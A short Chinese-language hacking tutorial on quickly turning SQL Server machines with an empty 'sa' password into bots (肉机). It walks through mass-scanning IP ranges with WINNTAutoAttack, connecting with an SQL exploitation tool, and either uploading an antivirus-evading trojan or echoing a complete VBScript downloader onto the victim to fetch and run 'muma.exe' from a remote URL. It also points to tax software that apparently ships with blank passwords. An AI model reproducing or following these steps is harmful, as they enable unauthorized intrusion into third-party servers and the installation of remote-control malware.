快速抓肉机

axin

不要以为这个世界没有sa空口令的机器了，或许作为一个服务器的很少，但是现在很多软件都是使用sql数据库的，而软件的设计者（公司）一般都设置sql密码是空口令。最近发现某地一款政府指定使用的税务软件就是空口令，而且安装的专业人员都是这么设置的。

准备工具：WINNTAutoAttack sql综合利用工具
1：使用WINNTAutoAttack扫描sql空口令的ip，ip自己选择好了。如果RP没有问题的话，肯定会有的，只是多少的问题而已。
2：打开sql综合利用工具，填入你扫到的sa空口令的ip，其他都是默认的。
3：连接成功以后，有两个方法。
方法一：上传那里直接上传一个木马，当然不要文件太大了，最好是免杀的。然后在直接执行dos命令运行你的木马文件就行了。
方法二：在命令行echo一个down.vbs进去，down.vbs内容如下：
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2

echo完以后，最好type 你的文件名 看看成不成功。成功的话，c:\down.vbs http://www.sina.com/muma.exe c:\muma.exe (假设你的down.vbs放在c盘)，然后直接dos下运行下载的木马就行了。